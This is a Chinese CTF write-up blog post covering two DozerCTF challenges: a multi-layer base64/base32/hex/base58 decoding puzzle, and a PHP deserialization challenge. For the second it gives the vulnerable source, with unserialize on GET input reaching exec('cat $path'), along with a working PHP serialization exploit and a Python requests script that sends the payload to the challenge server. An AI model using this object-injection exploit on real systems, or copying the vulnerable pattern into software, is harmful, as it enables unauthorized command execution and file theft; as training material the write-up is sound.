标签:php __file__ import flag exe += base eth const
------------恢复内容开始------------
1、签到题
exe文件打不开,然后我用记事本打开发现是一串字符,
R00yVE1NWlRIRTJFRU5CWUdVM1RNUlJURzRaVEtOUllHNFpUTU9CV0lJM0RRTlJXRzQ0VE9OSlhHWTJET05aUkc1QVRPTUJUR0kyRUVNWlZHNDNUS05aWEc0MlRHTkpaR1pBVElNUldHNDNUT05KVUc0M0RPTUJXR0kyRUtOU0ZHTTRUT09CVUc0M0VFPT09Cgo=
看到后面的等于号我就直接用base64解密,还是得到一串等于号结尾的字符串,继续用base64解解不出来,然后用base32解出来了
3563394B48576F37356873686B686679757647717A70324B3577577753596A426777547670624E6E3978476B
怀疑是hex加密,然后hex解密
5c9KHWo75hshkhfyuvGqzp2K5wWwSYjBgwTvpbNn9xGk
然后就卡住了,被大佬提醒是base58加密,
进行base58解密得出flag:
Dozerctf{base_family_is_so_good}
2、反序列化题
这道题确实是白给的
if ($_GET[‘path‘]) { $path = @$_GET[‘path‘]; unserialize($path); } else { highlight_file(__FILE__); }
直接插入反序列化的值没有设卡
class home { private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; } function __destruct() { if (in_array($this->method, array("mysys"))) { call_user_func_array(array($this, $this->method), $this->args); } } function mysys($path) { print_r(base64_encode(exec("cat $path"))); } function waf($str) { if (strlen($str) > 8) { die("No"); } return $str; } function __wakeup() { $num = 0; foreach ($this->args as $k => $v) { $this->args[$k] = $this->waf(trim($v)); $num += 1; if ($num > 2) { die("No"); } } } }
这到题主要就是绕过:in_array($this->method, array("mysys"))和__wakeup
其实第一个都不用绕过,直接上exp:
<? class home { private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; // print_r(array($this, $this->method)); } function __destruct() { if (in_array($this->method, array("mysys"))) { call_user_func_array(array($this, $this->method), $this->args); // echo 1; } } function mysys($path) { print_r(base64_encode(exec("cat $path"))); } function waf($str) { if (strlen($str) > 8) { die("No"); } return $str; } function __wakeup() { $num = 0; foreach ($this->args as $k => $v) { $this->args[$k] = $this->waf(trim($v)); $num += 1; if ($num > 2) { die("No"); } } } } $b = array(‘flag.php‘); $a =new home(‘mysys‘,$b); $a = serialize($a); echo base64_encode($a);
我本来是想直接用get方式传上去的但是试了几次没用我就改用python传了
import base64 import requests url = ‘http://118.31.11.216:30600/‘ php = base64.b64decode(‘Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NToibXlzeXMiO3M6MTA6IgBob21lAGFyZ3MiO2E6MTp7aTowO3M6ODoiZmxhZy5waHAiO319‘) # print(php) data = {‘path‘:php} r = requests.get(url,params=data) print(r.text)
这flag差不多就出来了
标签:php __file__ import flag exe += base eth const
原文地址:https://www.cnblogs.com/txxj/p/13131043.html